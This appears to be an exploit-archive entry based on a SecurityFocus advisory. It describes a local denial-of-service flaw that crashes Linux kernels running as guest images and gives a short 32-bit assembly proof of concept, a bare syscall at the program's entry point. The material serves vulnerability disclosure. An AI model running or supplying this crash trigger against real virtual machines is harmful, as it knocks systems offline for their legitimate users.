12 lines
No EOL
344 B
Text
12 lines
No EOL
344 B
Text
source: https://www.securityfocus.com/bid/51389/info
|
|
|
|
The Linux kernel is prone to a local denial-of-service vulnerability.
|
|
|
|
Attackers can exploit this issue to cause the kernel to crash, denying service to legitimate users.
|
|
|
|
NOTE: This issue affects Linux kernels running as guest images.
|
|
|
|
[bits 32]
|
|
global _start
|
|
SECTION .text
|
|
_start: syscall |